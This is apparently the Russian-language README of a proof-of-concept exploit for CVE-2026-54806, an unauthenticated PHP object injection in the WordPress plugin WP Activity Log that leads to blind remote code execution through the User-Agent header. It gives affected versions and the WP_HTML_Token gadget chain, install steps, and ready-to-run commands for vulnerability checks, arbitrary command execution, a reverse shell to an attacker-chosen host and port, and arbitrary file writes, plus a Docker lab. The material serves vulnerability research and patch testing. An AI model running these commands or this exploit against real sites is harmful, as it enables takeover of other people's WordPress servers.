Концепт-доказательство эксплойта для CVE-2026-54806: неаутентифицированное внедрение PHP-объектов в плагин WP Activity Log, обеспечивающее слепую RCE через заголовок User-Agent. Включает проверку уязвимости, выполнение команд, reverse shell и функции записи файлов с автономной Docker-лабораторией.
CVE-2026-54806 — это критическая (CVSS 9.8) неаутентифицированная уязвимость PHP Object Injection в WordPress-плагине WP Activity Log (wp-security-audit-log) от Melapress. Неаутентифицированный злоумышленник может внедрить сериализованные PHP-объекты через заголовок User-Agent в любом запросе, который вызывает регистрируемое событие (например, неудачную попытку входа). Внедренная полезная нагрузка хранится в базе данных и десериализуется без ограничений, когда администратор заходит в панель управления WordPress, что приводит к слепому удаленному выполнению кода (без возврата вывода злоумышленнику).
Затронутый плагин: WP Activity Log <= 5.6.3.1 (исправлено в 5.6.4)
Необходимые условия для RCE: WordPress 6.4.0 - 6.4.1 — этот PoC использует гаджет WP_HTML_Token, единственную цепочку ядра WP со всеми публичными свойствами, которая выдерживает sanitize_text_field() и укладывается в лимит столбца в 255 символов.
--check--command--shell--write-filegit clone https://github.com/joshuavanderpoll/CVE-2026-54806.git
cd CVE-2026-54806
python3 -m venv .venv
source .venv/bin/activate
pip3 install -r requirements.txt
git clone https://github.com/joshuavanderpoll/CVE-2026-54806.git
cd CVE-2026-54806
python3 -m venv .venv
.venv\Scripts\activate
pip3 install -r requirements.txt
python3 cve-2026-54806.py -t <target> --check
python3 cve-2026-54806.py -t <target> --command <cmd>
python3 cve-2026-54806.py -t <target> --shell --lhost <ip> --lport <port>
python3 cve-2026-54806.py -t <target> --write-file <content> <path>
Автономный лабораторный стенд с WordPress 6.4.1 + WP Activity Log 5.6.3.1. Подробности смотрите в DOCKER.md.
cd docker
docker compose up -d
python3 cve-2026-54806.py -t http://localhost:8080 --check
Стенд включает admin-bot, который каждые 60 секунд заходит на панель управления, поэтому внедренные полезные нагрузки срабатывают автоматически — ручное вмешательство не требуется.
Этот инструмент предоставляется только в образовательных и исследовательских целях. Создатель не несет ответственности за любое неправомерное использование или ущерб, причиненный данным инструментом.